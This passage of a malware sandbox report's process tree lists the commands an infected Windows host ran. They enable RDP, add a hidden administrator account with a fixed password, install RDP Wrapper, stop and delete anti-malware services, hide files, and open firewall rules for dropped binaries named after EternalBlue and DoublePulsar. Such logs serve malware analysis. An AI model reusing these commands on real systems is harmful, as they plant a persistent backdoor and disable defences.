          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:3964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:2056
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            PID:3400
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:4236
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:4388
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:4456
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4504
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4544
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:4576
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4748
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4792
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4840
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4936
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4380
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:4516
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:4688
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:4772
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:4804
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4964
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:1360
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:4992
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:2064
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:1960
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:3892
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:5036
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:3396
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:3816
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:1524
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4048
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:2004
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:992
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4376
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4312
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:940
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4472
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:4452
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4580
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:4768
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4764
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4888
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:556
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:2544
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    Modifies WinLogon
                    PID:4264
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:2844
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:4480
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5092
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5080
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:4196
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4288
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:4652
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:4716
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:4860
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:4916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:4956
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:5000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:5020
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:5032
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:3172
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4100
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:3296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4140
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4324
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4808
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4876
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:3860
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:5060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:2508
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4428
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:4208
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4816
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:4864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:4728
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:3176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:4968
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:5056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4116
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:1124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:968
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:3596
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:1384
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:4284
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4852
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4368
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4476
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:3600
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:5068
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:2860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4272
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4488
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4884
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:3952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4064
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:4268
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4528
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4572
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:4776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:4920
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:4460
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4900
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:5052
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:1420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:4960
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:4740
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:5004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:4252
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:3924
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4660
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:2564
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:5116
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:4868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4192
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4256
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:4828
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:5100
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:4756
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:4220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:5008
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:4596
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:4664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:2540
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:2260
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:2944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:4928
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:5096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4796
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:2036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:4656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:1560
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:4976
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:2016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:4948
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:4556
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:4292
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:4872
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:4680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:4536
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:4612
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:5016
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:4336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:4436
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:4216
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:5076
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:4464
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:1308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:1836
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:4744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:4416
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:1444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:3996
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:5072
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:5172
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:5204
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:5328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:5224
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:5372
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:5492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:5388
